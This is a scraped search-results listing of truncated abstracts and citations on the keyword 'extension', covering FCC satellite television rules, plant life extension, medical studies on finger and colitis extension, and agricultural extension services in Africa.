FEDERAL COMMUNICATIONS COMMISSION 47 CFR Part 73 [ET Docket No. 10-152; FCC 10-194] Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and Reauthorization Act of... and provisions of the Satellite Television Extension and Localism Act of 2010 (STELA). This model will... 11. 75 FR 46885 - Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and... Science.gov (United States) 2010-08-04 ... FEDERAL COMMUNICATIONS COMMISSION 47 CFR Part 73 [ET Docket No. 10-152; FCC 10-133] Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and Reauthorization Act of... Commission proposes to implement provisions of the Satellite Television Extension and Localism Act of 2010... 12. 75 FR 80354 - Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and... Science.gov (United States) 2010-12-22 ... FEDERAL COMMUNICATIONS COMMISSION 47 CFR Part 73 [ET Docket No. 10-152; FCC 10-194] Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and Reauthorization Act of... through the use of an antenna as required by the Satellite Television Extension and Localism Act of 2010... 13. Four Ways Life Extension will Change Our Relationship with Death. Science.gov (United States) Davis, John K 2016-03-01 Discussions of life extension ethics have focused mainly on whether an extended life would be desirable to have, and on the social consequences of widely available life extension. I want to explore a different range of issues: four ways in which the advent of life extension will change our relationship with death, not only for those who live extended lives, but also for those who cannot or choose not to. Although I believe that, on balance, the reasons in favor of developing life extension outweigh the reasons against doing so (something I won't argue for here), most of these changes probably count as reasons against doing so. First, the advent of life extension will alter the human condition for those who live extended lives, and not merely by postponing death. Second, it will make death worse for those who lack access to life extension, even if those people live just as long as they do now. Third, for those who have access to life extension but prefer to live a normal lifespan because they think that has advantages, the advent of life extension will somewhat reduce some of those advantages, even if they never use life extension. Fourth, refusing life extension turns out to be a form of suicide, and this will force those who have access to life extension but turn it down to choose between an extended life they don't want and a form of suicide they may (probably mistakenly) consider immoral. © 2015 John Wiley & Sons Ltd. 14. Proximal disease extension in patients with limited ulcerative colitis DEFF Research Database (Denmark) Burisch, Johan; Ungaro, Ryan; Vind, Ida 2017-01-01 Background and Aims: Disease extent in ulcerative colitis [UC] is dynamic and can progress over time. Little is known about risk factors for UC extension in the era of biologics. We investigated the risk of UC extension and subsequent risk of surgery in a Danish population-based cohort. Methods: All incident UC cases in a strictly defined Copenhagen area between 2003 and 2004 were followed prospectively through 2011.
Disease extension was defined as patients with limited UC [E1 or E2] at diagnosis having progressed from the initial extent by colonoscopy or surgery to E2 or extensive colitis … experienced disease extension. Only extent at diagnosis was a clinical predictor for disease extension. The risk of colectomy was increased in former smokers and patients who progressed to extensive colitis. This highlights the need to prevent disease progression in patients with limited UC, and to identify... 15. LANES - LOCAL AREA NETWORK EXTENSIBLE SIMULATOR Science.gov (United States) Gibson, J. 1994-01-01 The Local Area Network Extensible Simulator (LANES) provides a method for simulating the performance of high speed local area network (LAN) technology. LANES was developed as a design and analysis tool for networking on board the Space Station. The load, network, link and physical layers of a layered network architecture are all modeled. LANES models two different lower-layer protocols, the Fiber Distributed Data Interface (FDDI) and the Star*Bus. The load and network layers are included in the model as a means of introducing upper-layer processing delays associated with message transmission; they do not model any particular protocols. FDDI is an American National Standard and an International Organization for Standardization (ISO) draft standard for a 100 megabit-per-second fiber-optic token ring. Specifications for the LANES model of FDDI are taken from the Draft Proposed American National Standard FDDI Token Ring Media Access Control (MAC), document number X3T9.5/83-16 Rev. 10, February 28, 1986. This is a mature document describing the FDDI media-access-control protocol. Star*Bus, also known as the Fiber Optic Demonstration System, is a protocol for a 100 megabit-per-second fiber-optic star-topology LAN. This protocol, along with a hardware prototype, was developed by Sperry Corporation under contract to NASA Goddard Space Flight Center as a candidate LAN protocol for the Space Station. LANES can be used to analyze performance of a networking system based on either FDDI or Star*Bus under a variety of loading conditions. Delays due to upper-layer processing can easily be nullified, allowing analysis of FDDI or Star*Bus as stand-alone protocols. LANES is a parameter-driven simulation; it provides considerable flexibility in specifying both protocol and run-time parameters. Code has been optimized for fast execution and detailed tracing facilities have been included. LANES was written in FORTRAN 77 for implementation on a DEC VAX under VMS 4.6. It consists of two… 16. Life extension and life cycle management International Nuclear Information System (INIS) Hoang, H. 2010-10-01 To continue the role of nuclear energy as a clean energy source offsetting the increase in greenhouse gas emissions that contributes to global warming, the nuclear industry is focused on the optimization of its current nuclear generation assets. Plant life extension (Plex) and plant life management (Plim), together with power uprates, are the key strategies for the optimization effort. Plex begins with the process to obtain regulatory approval for an additional 20 years of operation, beyond the current 40-year limit. This highly standardized process consists of the following steps: 1) Scoping: identify the systems, structures and components for inclusion in the license renewal scope of work.
2) Screening: narrow down the selection of the in-scope systems, structures and components based on passive and long-lived characteristics. 3) Aging management review: demonstrate that aging effects will continue to be managed during the additional 20 years of operation. 4) Time limiting aging analyses: confirm the acceptability of design bases analyses that assume the 40-year plant life as a key input assumption. To provide a consistent approach for the preparation of the license renewal application, the following are the key guidance documents: NUREG-1800: Standard review plan; NUREG-1801: Generic aging lessons learned; Nuclear Energy Institute NEI 95-10. The objectives of Plim are to focus on improving plant reliability/availability, and to plan for equipment upgrades for efficiency improvement as well as technological obsolescence. Plim is a technical evaluation combined with a risk assessment to produce a long-range business plan with a time horizon of 10 years or longer. Due to its long-view nature, this plan will be reviewed on a yearly basis for any required adjustments. The technical evaluation consists of the following major steps: 1) Select systems, structures and components with a history of performance deficiencies. 2) Collect operating data 17. Biomimetic finger extension mechanism for soft wearable hand rehabilitation devices. Science.gov (United States) Kim, Dong Hyun; Heo, Si-Hwan; Park, Hyung-Soon 2017-07-01 For the rehabilitation and assistance of hand functions, wearable devices have been developed, and interest in tendon-driven mechanisms has especially increased since they allow a lightweight and compact design. Tendon-driven hand rehabilitation devices provide grasping force via exo-tendons routed on the dorsal and palmar sides of the hand and pulled by remotely located actuators. However, most of the devices were not able to provide a natural joint extension sequence of the finger and showed hyperextension of finger joints because the tendons for extension were fixed at the fingertip, concentrating the torque at the distal interphalangeal joint. In this study, a ring-type biomimetic finger extension mechanism was developed, which mimics the origin, structure, and orientation of the extensor tendon. The biomimetic mechanism was evaluated by comparing its motion with voluntary finger extension and with the motion made by other conventional tendon-driven finger extension mechanisms. The biomimetic extension mechanism provided the same joint extension sequence as voluntary finger extension, and its fully extended posture was the closest to voluntary finger extension among the tendon-driven mechanisms used in the experiments. The joint angle differences between the proposed tendon mechanism and voluntary finger extension were -1.2°±3.4°, -2.9°±2.0°, and -3.1°±8.0° for the distal phalangeal, proximal phalangeal, and metacarpo-phalangeal joints, respectively. 18. Autolysis and extension of isolated walls from growing cucumber hypocotyls Science.gov (United States) Cosgrove, D. J.; Durachko, D. M. 1994-01-01 Walls isolated from cucumber hypocotyls retain autolytic activities and the ability to extend when placed under the appropriate conditions. To test whether autolysis and extension are related, we treated the walls in various ways to enhance or inhibit long-term wall extension ('creep') and measured autolysis as release of various saccharides from the wall.
Except for some non-specific inhibitors of enzymatic activity, we found no correlation between wall extension and wall autolysis. Most notably, autolysis and extension differed strongly in their pH dependence. We also found that exogenous cellulases and pectinases enhanced extension in native walls, but when applied to walls previously inactivated with heat or protease these enzymes caused breakage without sustained extension. In contrast, pretreatment of walls with pectinase or cellulase, followed by boiling in methanol to inactivate the enzymes, resulted in walls with much stronger expansin-mediated extension responses. Crude protein preparations from the digestive tracts of snails enhanced extension of both native and inactivated walls, and these preparations contained expansin-like proteins (assessed by Western blotting). Our results indicate that the extension of isolated cucumber walls does not depend directly on the activity of endogenous wall-bound autolytic enzymes. The results with exogenous enzymes suggest that the hydrolysis of matrix polysaccharides may not induce wall creep by itself, but may act synergistically with expansins to enhance wall extension. 19. Correlation between extension-block K-wire insertion angle and postoperative extension loss in mallet finger fracture. Science.gov (United States) Lee, S K; Kim, Y H; Moon, K H; Choy, W S 2018-02-01 Extension-block pinning represents a simple and reliable surgical technique. Although this procedure is commonly performed successfully, some patients develop postoperative extension loss. To date, the relationship between extension-block Kirschner wire (K-wire) insertion angle and postoperative extension loss in mallet finger fracture remains unclear. We aimed to clarify this relationship and further evaluate how various operative and non-operative factors affect postoperative extension loss after extension-block pinning for mallet finger fracture. A retrospective study was conducted to investigate a relationship between extension block K-wire insertion angle and postoperative extension loss. The inclusion criteria were: (1) a dorsal intra-articular fracture fragment involving 30% of the base of the distal phalanx with or without volar subluxation of the distal phalanx; and (2) K-wire insertion angle and fixation angle of the distal interphalangeal (DIP) joint were assessed using lateral radiograph at immediate postoperative time. Postoperative extension loss was assessed by using lateral radiograph at latest follow-up. Extension-block K-wire insertion angle was defined as the acute angle between extension block K-wire and longitudinal axis of middle phalangeal head. DIP joint fixation angle was defined as the acute angle between the distal phalanx and middle phalanx longitudinal axes. Seventy-five patients were included. The correlation analysis revealed that extension-block K-wire insertion angle had a negative correlation with postoperative extension loss, whereas fracture size and time to operation had a positive correlation (correlation coefficient for extension block K-wire angle: -0.66, facture size: +0.67, time to operation: +0.60). When stratifying patients in terms of negative and positive fixation angle of the DIP joint, the independent t-test showed that mean postoperative extension loss is -3.67° and +4.54° (DIP joint fixation angles of K 20. Proactive life extension of pressure vessels Science.gov (United States) Mager, Lloyd 1998-03-01 place while our vessels are in service. 
As the inspection takes place we are able to view a real-time image of detected discontinuities on a video monitor. The B-scan ultrasonic technique allows us to perform fast, accurate examinations covering up to 95% of the surface area of each pressure vessel. Receiving data on 95% of a pressure vessel provides us with a lot of useful information. We use this data to determine the condition of each pressure vessel. Once the condition is known the vessels are classed by risk. The risk level is then managed by making decisions related to repair, operating parameters, accepting and monitoring, or replacement of the equipment. Inspection schedules are set at maximum intervals and reinspection is minimized for the vessels that are not at risk. The remaining life of each pressure vessel is determined, mechanical integrity is proven and regulatory requirements are met. Abbott Laboratories is taking this proactive approach because we understand that our process equipment is a critical element for successful operation. A run-to-failure practice would never allow Abbott Laboratories to achieve the corporation's objective of being the world's leading health care company. Nondestructive state-of-the-art technology and the understanding of its capabilities and limitations are key components of a proactive program for life extension of pressure vessels. 1. Research on Customer Value Based on Extension Data Mining Science.gov (United States) Chun-Yan, Yang; Wei-Hua, Li Extenics is a new discipline for dealing with contradiction problems using formalized models. Extension data mining (EDM) is a product of combining Extenics with data mining. It seeks to acquire knowledge based on extension transformations, called extension knowledge (EK), by taking advantage of extension methods and data mining technology. EK includes extensible classification knowledge, conductive knowledge and so on. Extension data mining technology (EDMT) is a new data mining technology that mines EK in databases or data warehouses. Customer value (CV) weighs how essential a customer relationship is to an enterprise, with the enterprise as the subject that assesses value and its customers as the objects whose value is assessed. CV varies continually. Mining the changing knowledge of CV in databases using EDMT, including quantitative change knowledge and qualitative change knowledge, can provide a foundation on which an enterprise can decide its customer relationship management (CRM) strategy. It can also provide a new idea for studying CV. 2. Segment-Specific Adhesion as a Driver of Convergent Extension Science.gov (United States) Vroomans, Renske M. A.; Hogeweg, Paulien; ten Tusscher, Kirsten H. W. J. 2015-01-01 Convergent extension, the simultaneous extension and narrowing of tissues, is a crucial event in the formation of the main body axis during embryonic development. It involves processes on multiple scales: the sub-cellular, cellular and tissue level, which interact via explicit or intrinsic feedback mechanisms. Computational modelling studies play an important role in unravelling the multiscale feedbacks underlying convergent extension. Convergent extension usually operates in tissue which has been patterned or is currently being patterned into distinct domains of gene expression. How such tissue patterns are maintained during the large scale tissue movements of convergent extension has thus far not been investigated.
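As orientation for the Cellular Potts Model named in the segment-specific adhesion entry just above (whose abstract continues below): differential adhesion in a CPM is conventionally encoded in the Glazier–Graner energy function. The display that follows is the standard textbook form, given only for orientation; it is not quoted from this paper, and the notation is the generic one rather than the authors'.

```latex
% Standard Cellular Potts Model energy (Glazier--Graner form), for orientation only.
% sigma_i   : index of the cell occupying lattice site i
% tau(s)    : type (e.g. segment identity) of cell s
% J(.,.)    : contact energy between two cell types; choosing a lower J for like-typed
%             (same-segment) neighbours is one way to implement segment-specific adhesion
% a_c, A_c  : current and target area of cell c; lambda is the area-constraint strength
\[
  H \;=\; \sum_{\langle i,j\rangle} J\bigl(\tau(\sigma_i),\tau(\sigma_j)\bigr)\,
          \bigl(1-\delta_{\sigma_i\sigma_j}\bigr)
  \;+\; \lambda \sum_{c} \bigl(a_c - A_c\bigr)^{2}.
\]
```

Metropolis-style updates that tend to lower H then let cells rearrange, which is how adhesion differences can translate into tissue-level movements such as convergent extension.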
Intriguingly, experimental data indicate that in certain cases these tissue patterns may drive convergent extension rather than requiring safeguarding against convergent extension. Here we use a 2D Cellular Potts Model (CPM) of a tissue prepatterned into segments, to show that convergent extension tends to disrupt this pre-existing segmental pattern. However, when cells preferentially adhere to cells of the same segment type, segment integrity is maintained without any reduction in tissue extension. Strikingly, we demonstrate that this segment-specific adhesion is by itself sufficient to drive convergent extension. Convergent extension is enhanced when we endow our in silico cells with persistence of motion, which in vivo would naturally follow from cytoskeletal dynamics. Finally, we extend our model to confirm the generality of our results. We demonstrate a similar effect of differential adhesion on convergent extension in tissues that can only extend in a single direction (as often occurs due to the inertia of the head region of the embryo), and in tissues prepatterned into a sequence of domains resulting in two opposing adhesive gradients, rather than alternating segments. PMID:25706823 3. On the Rank of Elliptic Curves in Elementary Cubic Extensions Directory of Open Access Journals (Sweden) Rintaro Kozuma 2015-01-01 Full Text Available We give a method for explicitly constructing an elementary cubic extension $L$ over which an elliptic curve $E_D: y^2 + Dy = x^3$ ($D \in \mathbb{Q}^*$) has Mordell–Weil rank of at least a given positive integer, by finding a close connection between a 3-isogeny of $E_D$ and a generic polynomial for cyclic cubic extensions. In our method, the extension degree $[L:\mathbb{Q}]$ often becomes small. 4. A Proposal for Public and Private Partnership in Extension. Science.gov (United States) Krell, Rayda K; Fisher, Marc L; Steffey, Kevin L 2016-01-01 Public funding for Extension in the United States has been decreasing for many years, but farmers' need for robust information on which to make management decisions has not diminished. The current Extension funding challenges provide motivation to explore a different model for developing and delivering extension. The private sector has partnered with the public sector to fund and conduct agricultural research, but partnering on extension delivery has occurred far less frequently. The fundamental academic strength and established Extension network of the public sector combined with the ability of the private sector to encourage and deliver practical, implementable solutions has the potential to provide measurable benefits to farmers. This paper describes the current Extension climate, presents data from a survey about Extension and industry relationships, presents case studies of successful public- and private-sector extension partnerships, and proposes a framework for evaluating the state of effective partnerships. Synergistic public-private extension efforts could ensure that farmers receive the most current and balanced information available to help with their management decisions. 5. An extension for dynamic lot-sizing heuristics Directory of Open Access Journals (Sweden) Fabian G. Beck 2015-01-01 Full Text Available This paper presents an efficient procedure to extend dynamic lot-sizing heuristics that has been overlooked by inventory management literature and practice. Its intention is to show that the extension improves the results of basic heuristics significantly.
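To make the lot-sizing entry above more concrete before its abstract continues: the "basic dynamic lot-sizing heuristics" that such extensions build on are period-by-period rules such as Silver–Meal. The sketch below is a plain Silver–Meal baseline in Python, written as orientation under my own assumptions; it is not the extension procedure proposed in the entry, and the demand and cost figures are invented.

```python
def silver_meal(demand, setup_cost, holding_cost):
    """Classic Silver-Meal heuristic: keep adding future periods to the current lot
    while the average cost per covered period (setup + carrying) does not rise."""
    lots = []                      # planned order quantity for each period
    t, n = 0, len(demand)
    while t < n:
        best_avg = float("inf")
        carrying = 0.0
        k = 0                      # periods already accepted into the lot started at t
        while t + k < n:
            carrying += k * holding_cost * demand[t + k]   # demand of period t+k is held k periods
            avg = (setup_cost + carrying) / (k + 1)
            if avg > best_avg:     # average cost started rising -> stop extending this lot
                break
            best_avg = avg
            k += 1
        periods = max(k, 1)
        lots.extend([sum(demand[t:t + periods])] + [0] * (periods - 1))
        t += periods
    return lots

# Hypothetical data, purely for illustration.
print(silver_meal([80, 100, 125, 100, 50, 50, 100, 125], setup_cost=100, holding_cost=1))
```

Extensions of the kind the entry describes typically add a look-ahead or cost correction around such a rule; the code shows only what a basic heuristic looks like.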
We first present a comprehensive description of the extension procedure and then test its performance in an extensive numerical study. Our analysis shows that the extension is an efficient tool to improve basic dynamic lot-sizing heuristics. The results of the paper may be used in inventory management to assist researchers in selecting dynamic lot-sizing heuristics and may be of help for practitioners as decision support. 6. Safety design guides for containment extension for CANDU 9 International Nuclear Information System (INIS) Lee, Duk Su; Chang, Woo Hyun; Lee, Nam Young; A. C. D. Wright 1996-03-01 This safety design guide for containment extension describes the containment isolation philosophy and containment extension requirements. The metal extensions and components falling within the scope of ASME Section III are classified in accordance with CAN/CSA-N285.0 and CAN/CSA-N285.3. The special considerations for leak monitoring capability, seismic qualification and inspection requirements for containment extensions, etc., are defined in this design guide. In addition, the containment isolation systems are defined and summarized schematically in appendix A. The change status of the regulatory requirements, codes and standards should be traced and this safety design guide shall be updated accordingly. (Author) 7. An Extension of the Mean Value Theorem for Integrals Science.gov (United States) Khalili, Parviz; Vasiliu, Daniel 2010-01-01 In this note we present an extension of the mean value theorem for integrals. The extension we consider is motivated by an older result (here referred to as Corollary 2), which is quite classical in the literature of Mathematical Analysis or Calculus. We also show an interesting application for computing the sum of a harmonic series. 8. 48 CFR 52.211-13 - Time Extensions. Science.gov (United States) 2010-10-01 ... extension may provide that the contract completion date will be extended only for those specific elements...) CLAUSES AND FORMS SOLICITATION PROVISIONS AND CONTRACT CLAUSES Text of Provisions and Clauses 52.211-13...) Time extensions for contract changes will depend upon the extent, if any, by which the changes cause... 9. A Meta-Analysis of Extensive Reading Research Science.gov (United States) Nakanishi, Takayuki 2015-01-01 The purposes of this study were to investigate the overall effectiveness of extensive reading, whether learners' age impacts learning, and whether the length of time second language learners engage in extensive reading influences test scores. The author conducted a meta-analysis to answer research questions and to identify future research… 10. Effect of Personality Types of Extension Personnel on their Job ... African Journals Online (AJOL) ... of extension personnel of 0.411 at 0.01 level of significance, with more of the extension personnel with ESFJ (Extroverted feeling with sensing) (29.82%) personality type followed by ISFJ (Introverted sensing with feeling) (19.3%) and ENFJ (Extroverted feeling with intuiting) (12.28), ENFP (Extroverted intuiting with feeling), ... 11. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza Effective engagement of extension in agricultural development requires a change of extension approach ..... is consistent with the assertion made by the Secretariat of the Pacific Community (2010: n. pag.) that, "the .... found in West African countries including projects such as: ICT Support for Agricultural Literacy in Ghana ... 12.
evaluation of job performance of village extension agents in lagos ... African Journals Online (AJOL) AFINNI IMAM Journal of Agricultural Extension. Vol. 13 (2) December 2009. Probit Analysis of Women's Access to Agricultural Inputs in. Bosso Local Government Area, Niger State, Nigeria. Olaleye, R. S , Ibrahim, M. and Ojo, M. A. Dept. of Agric Econs. and Extension Tech. Federal University Of Technology. P.M.B.65, Minna, Niger State. 13. The perception of agricultural extension agents on job motivation in ... African Journals Online (AJOL) This study examined extension agent perception on job motivation in Kwara State, Nigeria. The study engaged the entire 106 agricultural extension agents in Kwara State. Data were analysed using both Descriptive Statistics and Pearson Product Moment Correlation (PPMC). Results showed that the major perceived ... 14. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza There is no one set of challenges that justify privatization of extension and advisory services both in developed and developing areas. It is argued that factors that can influence privatization include; limited budget provisions and ineffectiveness of extension and advisory services. Literature is full of lessons on the failure and ... 15. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI 2Department of Agricultural Economics and Extension. Delta State University, Asaba ... overview of the mechanisms through which mobile phone telephony can affect economic development in sub-Saharan Africa ... 3. identify the areas of agricultural extension services/information dissemination supported by mobile phone. 16. Use of Internet for Innovation Management by Extension Agents in ... African Journals Online (AJOL) User Journal of Agricultural Extension. Abstracted by: EBSCOhost, Electronic Journals Service (EJS), ... Internet services and resources, it is essential that extension services and farmers should be enabled to have better ..... among the notable areas include; time-saving, increased efficiency, saves energy, process, and store and ... 17. Treatment strategies for extensive chronic SFA occlusions : indications and results NARCIS (Netherlands) Lensvelt, M. M. A.; Reijnen, M. M. P. J.; De Vries, B. M. Wallis; Zeebregts, C. J. Treatment modalities for extensive chronic occlusive disease of the superficial femoral artery (SFA) have changed during the last decades. In this chapter we provide an overview of current treatment modalities for extensive chronic occlusive disease of the SFA. Although the autologous venous conduit 18. Treatment strategies for extensive chronic SFA occlusions: indications and results. NARCIS (Netherlands) Lensvelt, M.M.A.; Reijnen, M.M.P.J.; Wallis de Vries, B.M.; Zeebregts, C.J.A. 2012-01-01 Treatment modalities for extensive chronic occlusive disease of the superficial femoral artery (SFA) have changed during the last decades. In this chapter we provide an overview of current treatment modalities for extensive chronic occlusive disease of the SFA. Although the autologous venous conduit 19. 12 CFR 215.3 - Extension of credit. Science.gov (United States) 2010-01-01 ... OFFICERS, DIRECTORS, AND PRINCIPAL SHAREHOLDERS OF MEMBER BANKS (REGULATION O) § 215.3 Extension of credit... 12 Banks and Banking 2 2010-01-01 2010-01-01 false Extension of credit. 215.3 Section 215.3 Banks... 
bank for its own protection for: (i) Accrued interest; or (ii) Taxes, insurance, or other expenses... 20. Perceived Factors Affecting Performance Of Extension Workers In ... African Journals Online (AJOL) The study focused on perceived factors affecting performance of extension workers in Imo State, Nigeria. Data for the study was collected from 83 Extension agents from the Imo State Agricultural Development Programme (ADP). Results of the study revealed that the organizational factors that affect performance are ... 1. Cooperative Extension Answers the Call to Action to Support Breastfeeding Science.gov (United States) Brill, Michelle F. 2016-01-01 Extension has many opportunities to promote breastfeeding, one of the most highly effective preventive measures a mother can take to protect the health of her infant and herself. This article describes how and why Cooperative Extension can and should partner with federal and state efforts to promote breastfeeding. Members of Rutgers' Family and… 2. Arc parallel extension in Higher and Lesser Himalayas, evidence ... extension determined based on geodetically computed extension rate and age of initiation of rifting in southern ..... sive distribution of these extensional structures in the Lesser Himalayas, we analysed incised fluvial terrace deposits. In the eastern Himalaya, the MCT ..... and Duncan C 2006 Climatic forcing of erosion, land-. 3. A Look Inside: Self-Leadership Perceptions of Extension Educators Science.gov (United States) Ricketts, Kristina G.; Carter, Hannah S.; Place, Nick T.; McCoy, Teresa 2012-01-01 Extension educators are often considered influential community leaders. Still the question remains--how do educators motivate themselves to success? Does this contribute towards their self-leadership perceptions? Specialists from three universities administered a survey to look at the "self-leadership" of Extension educators. Results… 4. Extension needs in quail farming in Imo State, Nigeria | Iwuchukwu ... African Journals Online (AJOL) ... to information on how to rear quail” (M= 2.71).The study recommended the need to boost research on quail production so that extension workers, farmers and consumers will appreciate the importance of this livestock and enjoy it”s nutritional and economic benefits. Key words: extension needs quail farming Imo State ... 5. Information Search Behaviors of Indian Farmers: Implications for Extension Services Science.gov (United States) Glendenning, Claire J.; Babu, Suresh C.; Asenso-Okyere, Kwadwo 2012-01-01 Purpose: In India, a national survey conducted in 2003 showed that only 40% of farmers accessed extension. But little is known of the characteristics of farmers who did not access extension. However, this understanding is needed in order to target approaches to farmers, who differ in their access and use of information, that is their information… 6. Analysis of issues related to organizational commitment of extension ... African Journals Online (AJOL) Organizational commitment of extension personnel in Oyo and Ogun States Agricultural Development Programmes was studied. Organizational commitment is the degree to which the organization members identify with the values and goals of their organization. A census of the extension personnel in both OYSADEP (312) ... 7. Extension agents\\' marketing related services: The relevance to ... African Journals Online (AJOL) This study investigated the marketing related services provided to farmers by extension agents in Osun State, Nigeria. 
Data were collected from the extension agents in the services of Osun State Agricultural Development Projects, which is the government outfit to provide such services to farmers on one hand and their ... 8. Individual and Group Extension Methods: Perspectives from Vi ... African Journals Online (AJOL) Participatory Rural Appraisals (PRAs) tools including semi-structured questionnaires were administrated to 90 randomly selected farmers who had received extension services from the project. In addition, twelve project extension workers were interviewed. Data were analysed using SPSS computer package and descriptive ... 9. 15 CFR 766.16 - Procedural stipulations; extension of time. Science.gov (United States) 2010-01-01 ... 15 Commerce and Foreign Trade 2 2010-01-01 2010-01-01 false Procedural stipulations; extension of... REGULATIONS ADMINISTRATIVE ENFORCEMENT PROCEEDINGS § 766.16 Procedural stipulations; extension of time. (a) Procedural stipulations. Unless otherwise ordered, a written stipulation agreed to by all parties and filed... 10. 15 CFR 280.217 - Procedural stipulations; extension of time. Science.gov (United States) 2010-01-01 ... 15 Commerce and Foreign Trade 1 2010-01-01 2010-01-01 false Procedural stipulations; extension of... ASSESSMENT PROGRAMS FASTENER QUALITY Enforcement § 280.217 Procedural stipulations; extension of time. (a) Procedural stipulations. Unless otherwise ordered, a written stipulation agreed to by all parties and filed... 11. 31 CFR 585.406 - Extensions of credits or loans. Science.gov (United States) 2010-07-01 ... 31 Money and Finance: Treasury 3 2010-07-01 2010-07-01 false Extensions of credits or loans. 585.406 Section 585.406 Money and Finance: Treasury Regulations Relating to Money and Finance (Continued... Interpretations § 585.406 Extensions of credits or loans. (a) The prohibition in § 585.210 applies to the... 12. research and extension processes and practices in relation to ... African Journals Online (AJOL) p2333147 Key Words: Failure “ToT,” research-extension-farmer linkages, alternative paradigm, pro-poor extension ... introduced during the colonial era, failed to provide research and technology outputs that meet smallholder ... In addition, successful smallholder farmer innovations, technologies and dissemination approaches are not ... 13. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza ABSTRACT. This paper describes natural resource factors in order to assist extension service with decision making ... Extension service can also play a key role in agricultural decision-making and planning purposes in a particular area. ..... POOLEY, E., 1998. A Field Guide to Wild Flowers of KwaZulu-Natal and the Eastern. 14. Knowledge Levels of Extension Agents and their Perceived Impact ... African Journals Online (AJOL) This study examined the knowledge levels of extension agents and their perceived impact of climate change on extension service provision in Ghana. Specifically, it examined awareness levels of agents on the causes, effects and methods for mitigating climate change. It also determined their perceived impact of climate on ... 15. Monitoring extensions for component-based distributed software NARCIS (Netherlands) Diakov, N.K.; Papir, Z.; van Sinderen, Marten J.; Quartel, Dick 2000-01-01 This paper defines a generic class of monitoring extensions to component-based distributed enterprise software. Introducing a monitoring extension to a legacy application system can be very costly. 
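Because the monitoring-extensions entry just above (its abstract continues on the next line) turns on how costly it is to add monitoring to legacy components, a small illustration may help: the usual low-cost pattern is to intercept calls at component boundaries rather than edit the components themselves. The Python below is a generic sketch of that pattern under my own assumptions; the component and method names are hypothetical, and it is not the monitoring extension mechanism defined in the paper.

```python
import functools
import logging
import time

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("monitoring")

def monitored(func):
    """Generic monitoring interceptor: records call latency and failures
    without modifying the wrapped component's own code."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        try:
            return func(*args, **kwargs)
        except Exception:
            log.exception("call to %s failed", func.__qualname__)
            raise
        finally:
            elapsed_ms = (time.perf_counter() - start) * 1000
            log.info("%s took %.2f ms", func.__qualname__, elapsed_ms)
    return wrapper

class OrderComponent:              # hypothetical legacy component
    @monitored
    def place_order(self, item, qty):
        return f"ordered {qty} x {item}"

print(OrderComponent().place_order("widget", 3))
```

In a distributed component system the same idea is usually realised with proxies or middleware interceptors, so the monitored components themselves stay untouched.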
In this paper, we identify the minimum support for application monitoring within the generic 16. Extension's Future: Time for Disruptive Innovation Science.gov (United States) Franz, Nancy K.; Cox, Ronald A. 2012-01-01 Extension has been considered change averse by some scholars and practitioners, and they claim this inhibits organizational growth and relevance. Pockets of individuals and teams across the nation have worked independently as entrepreneurs to enhance Extension's relevance by introducing organizational processes and programs that greatly… 17. A business model framework for product life extension NARCIS (Netherlands) Den Hollander, M.C.; Bakker, C.A. 2012-01-01 Product life extension is an increase in the utilization period of products. Design research on product life extension strategies has so far mainly focused on technical aspects of products, like ‘prevention engineering’ or ‘design for repair, maintenance and upgradability’, and on individual 18. Extension systems in Southern African countries: A review | Oladele ... African Journals Online (AJOL) This paper reviews extension systems in selected southern African countries with a view of identifying the features of the systems and how they have been able to reach their target audience. Some of the features are use of committees for research and extension linkages, involvement of NGOs and private sector, the use ... 19. Extensions to the Speech Disorders Classification System (SDCS) Science.gov (United States) Shriberg, Lawrence D.; Fourakis, Marios; Hall, Sheryl D.; Karlsson, Heather B.; Lohmeier, Heather L.; McSweeny, Jane L.; Potter, Nancy L.; Scheer-Cohen, Alison R.; Strand, Edythe A.; Tilkens, Christie M.; Wilson, David L. 2010-01-01 This report describes three extensions to a classification system for paediatric speech sound disorders termed the Speech Disorders Classification System (SDCS). Part I describes a classification extension to the SDCS to differentiate motor speech disorders from speech delay and to differentiate among three sub-types of motor speech disorders.… 20. An ICT-Based Agricultural Extension Service Delivery for Nigeria ... African Journals Online (AJOL) This paper proposed an ICT-based extension service delivery for Nigeria. The proposed design, though to be use as supplement to the existing system would engender an extension delivery system that is void of many of the limitations inherent in the earlier approaches. Basically, it revolves round the use ICT facilities like ... 1. University Extension Reconsidered. Vaughan Papers in Adult Education, II. Science.gov (United States) Pashley, B.W. Based on an unpublished 1950 masters thesis, this paper on university extension in Britain reviews the nineteenth century background at Oxford, Cambridge, Victoria, and other universities, the close of the so-called classical period during 1900-24, the growing institutionalization of university extension during 1924-39, and postwar trends toward… 2. Building the capacity of agricultural extension personnel for effective ... African Journals Online (AJOL) This paper strongly recommends immediate recruitment of new hands as well as full implementation of a well-designed capacity building programme so as to ensure a sustainable extension service delivery system where extension personnel can operate in the expected commercial (agriculture-driven) economy. Keywords: ... 3. 
Subsystem Design Guidelines for Extensible General-Purpose Software NARCIS (Netherlands) Grefen, P.W.P.J.; Wieringa, Roelf J.; Magee, J.N.; Perry, D.E. 1998-01-01 We discuss subsystem design for extensible general-purpose information systems. We extract guidelines from a case study of the redesign and extension of an advanced workflow management system and place them into the context of existing software engineering research. A key aspect is the distinction 4. Towards designing a new agricultural extension service for the ... African Journals Online (AJOL) Staffing. This paper is aimed at discussing the identified factors, related to organizational and human capital development, that are essential for effective extension, and will propose the basis and design framework of an extension model discussed in a later paper. Researchers who are currently undergoing an academic ... 5. Extension Systems in Tanzania: Identifying Gaps in Research African Journals Online (AJOL) The terms extension systems (ES) and agricultural extension systems (AES) in this review paper will be used interchangeably. However, the focus will be on AES, defined as an agricultural information exchange system which shows the actors, people and institutions, their interactions and communication networks. 6. Impact of agricultural extension services on adoption of root crops ... African Journals Online (AJOL) Impact of agricultural extension services on adoption of root crops technologies in 